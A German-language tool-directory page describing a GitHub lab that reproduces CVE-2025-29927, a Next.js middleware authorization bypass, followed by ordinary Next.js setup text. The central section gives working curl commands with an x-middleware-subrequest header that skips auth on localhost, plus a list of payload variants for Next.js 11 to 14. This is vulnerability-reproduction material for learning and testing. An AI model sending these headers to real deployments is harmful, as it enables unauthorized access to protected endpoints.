Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
vulnerable-nextjs-14-CVE-2025-29927 — Reproduktionsumgebung für CVE-2025-29927, die eine Next.js-Middleware-Autorisierungsumgehung über den x-middleware-subrequest-Header demonstriert. Enthält curl-basierte Exploit-Schritte für mehrere Next.js-Versionen. | Kitploit
Tools/GitHubGitHub/lirantal/vulnerable-nextjs-14-cve-2025-29927
Authentifizierung & AutorisierungSchwachstellenanalyseWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHublirantal/vulnerable-nextjs-14-cve-2025-29927

vulnerable-nextjs-14-CVE-2025-29927

Reproduktionsumgebung für CVE-2025-29927, die eine Next.js-Middleware-Autorisierungsumgehung über den x-middleware-subrequest-Header demonstriert. Enthält curl-basierte Exploit-Schritte für mehrere Next.js-Versionen.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
148vor 2 MonatenNoch nicht geprüft

CVE-2025-29927 Authentifizierungsumgehung - Reproduktion

Dieses Repository ist eine Reproduktion der CVE-2025-29927 Schwachstelle im next Paket

Reproduktion

  1. Befolgen Sie die untenstehenden Schritte, um die Next.js-Anwendung zu klonen und auszuführen.
  2. Testen Sie, dass die Autorisierung den Zugriff auf den Endpunkt /api/hello verweigert.
root@kitploit:~
$ curl http://localhost:3000/api/hello

{"error":"Unauthorized"}%
  1. Testen Sie, dass die Autorisierung funktioniert, wenn ein Token bereitgestellt wird.
root@kitploit:~
$ curl -H "Authorization: my-jwt-token-here" http://localhost:3000/api/hello

{"message":"Hello World"}%
  1. Nun kann es auch umgangen werden, indem wir middleware 5-mal in den speziellen x-middleware-subrequest Header verschachteln:
root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/api/hello

{"message":"Hello, World"}

CVE-2025-29927 Ausnutzung für ältere Next.js-Versionen

Die Versionen Next.js 12 und 13 hatten eine andere Namenskonvention für die Middleware-Datei (_middleware.js), die in Next.js 14 auf middleware.js geändert wurde. Diese Schwachstelle kann in älteren Versionen durch Verwendung der Datei _middleware.js ausgenutzt werden.

Zum Beispiel würden die folgenden Payloads gelten, abhängig von der Next.js-Version und Ihrer Routing-Konvention:

  • curl -H "x-middleware-subrequest: middleware" http://localhost:3000/api/hello (für Next.js Versionen 12.2 mit der Datei middleware.js im Stammverzeichnis der App, nicht im Verzeichnis pages)
    • curl -H "x-middleware-subrequest: src/middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: _middleware" http://localhost:3000/api/hello (für Next.js Versionen 11 bis einschließlich 12.2)
  • curl -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: pages/admin/_middleware" http://localhost:3000/api/hello

Erste Schritte

Starten Sie zuerst den Entwicklungsserver:

root@kitploit:~
npm run dev
# oder
yarn dev
# oder
pnpm dev
# oder
bun dev

Öffnen Sie http://localhost:3000 in Ihrem Browser, um das Ergebnis zu sehen.

Sie können die Seite bearbeiten, indem Sie app/page.js ändern. Die Seite wird beim Bearbeiten der Datei automatisch aktualisiert.

Dieses Projekt verwendet next/font, um Geist, eine neue Schriftfamilie für Vercel, automatisch zu optimieren und zu laden.

Weitere Informationen

Um mehr über Next.js zu erfahren, werfen Sie einen Blick auf die folgenden Ressourcen:

  • Next.js Dokumentation - erfahren Sie mehr über Next.js-Funktionen und API.
  • Next.js lernen - ein interaktives Tutorial.

Sie können sich das Next.js GitHub Repository ansehen - Ihr Feedback und Ihre Beiträge sind willkommen!

Bereitstellung auf Vercel

Der einfachste Weg, Ihre Next.js-App bereitzustellen, ist die Nutzung der Vercel Plattform von den Erstellern von Next.js.

Weitere Informationen finden Sie in unserer Next.js Bereitstellungsdokumentation.

Mitwirken

Bitte konsultieren Sie CONTRIBUTING für Richtlinien zur Mitarbeit an diesem Projekt.

Tool herunterladen